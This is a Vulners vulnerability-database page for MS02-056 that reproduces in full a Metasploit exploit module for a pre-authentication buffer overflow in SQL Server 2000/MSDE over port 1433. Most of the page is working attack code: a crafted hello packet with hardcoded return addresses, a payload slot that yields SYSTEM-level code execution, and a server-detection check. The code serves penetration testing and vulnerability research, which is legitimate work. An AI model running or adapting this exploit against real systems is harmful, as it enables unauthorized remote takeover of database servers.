Lucene search
K

MS02-056 Microsoft SQL Server Hello Overflow

🗓️ 16 Jan 2006 03:48:36Reported by MC <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 24 Views

MS02-056 Microsoft SQL Server Hello Overflow vulnerability allows unauthenticated remote attacker to execute code on the server with SYSTEM level privileges by sending malformed data to TCP port 1433

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::MSSQL

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MS02-056 Microsoft SQL Server Hello Overflow',
      'Description'    => %q{
          By sending malformed data to TCP port 1433, an
        unauthenticated remote attacker could overflow a buffer and
        possibly execute code on the server with SYSTEM level
        privileges. This module should work against any vulnerable
        SQL Server 2000 or MSDE install (< SP3).

      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2002-1123'],
          [ 'OSVDB', '10132'],
          [ 'BID', '5411'],
          [ 'MSB', 'MS02-056'],

        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 512,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
        },
      'Targets'        =>
        [
          [
            'MSSQL 2000 / MSDE <= SP2',
            {
              'Platform' => 'win',
              'Rets'     => [0x42b68aba, 0x42d01e50],
            },
          ],
        ],
      'Platform'       => 'win',
      'DisclosureDate' => '2002-08-05',
      'DefaultTarget' => 0))
  end

  def check
    info = mssql_ping
    if (info['ServerName'])
      print_status("SQL Server Information:")
      info.each_pair { |k,v|
        print_status("   #{k + (" " * (15-k.length))} = #{v}")
      }
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect
    buf = "\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b" +
      "\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02" +
      "\x10\x00\x00\x00" +
      rand_text_english(528, payload_badchars) +
      "\x1B\xA5\xEE\x34" +
      rand_text_english(4, payload_badchars) +
      [ target['Rets'][0] ].pack('V') +
      [ target['Rets'][1], target['Rets'][1] ].pack('VV') +
      '3333' +
      [ target['Rets'][1], target['Rets'][1] ].pack('VV') +
      rand_text_english(88, payload_badchars) +
      payload.encoded +
      "\x00\x24\x01\x00\x00"

    sock.put(buf)

    handler
    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
8.3High risk
Vulners AI Score8.3
CVSS 27.5
EPSS0.77712
24